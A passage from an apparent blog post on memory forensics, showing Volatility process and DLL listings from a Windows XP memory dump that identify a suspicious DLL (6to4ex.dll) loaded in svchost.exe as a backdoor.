0x822e9700 spoolsv.exe 1348 680 10 105 0 0 2012-11-26 22:03:34
0x8203c020 alg.exe 1888 680 6 105 0 0 2012-11-26 22:03:35
0x8204f020 explorer.exe 284 244 9 372 0 0 2012-11-26 22:03:58
0x82226650 msmsgs.exe 548 284 3 204 0 0 2012-11-26 22:04:03
0x822408d0 ctfmon.exe 556 284 1 75 0 0 2012-11-26 22:04:03
0x82045da0 wuauclt.exe 1628 1024 3 142 0 0 2012-11-26 22:04:43
0x821feda0 msimn.exe 1984 284 7 359 0 0 2012-11-26 22:06:33
0x82049690 wc.exe 364 1024 1 27 0 0 2012-11-27 01:30:00
0x822d0828 cmd.exe 1796 284 1 33 0 0 2012-11-27 01:56:21
0x820b13b8 mdd.exe 244 1796 1 24 0 0 2012-11-27 01:57:28
Unfortunately, none of these processes are immediately malicious. However, we can check the dlls used by each.
$ vol.py -f memdump.bin --profile=WinXPSP2x86 dlllist
svchost.exe pid: 1024
Command line : C:\WINDOWS\System32\svchost.exe -k netsvcs
Service Pack 3
...snip...
0x50640000 0xc000 C:\WINDOWS\system32\wups.dll
0x5f740000 0xe000 C:\WINDOWS\System32\wbem\ncprov.dll
0x10000000 0x1c000 c:\windows\system32\6to4ex.dll
0x73b80000 0x12000 c:\windows\system32\AVICAP32.dll
0x75a70000 0x21000 c:\windows\system32\MSVFW32.dll
...snip...
And we see our backdoor.
No comments:
Post a Comment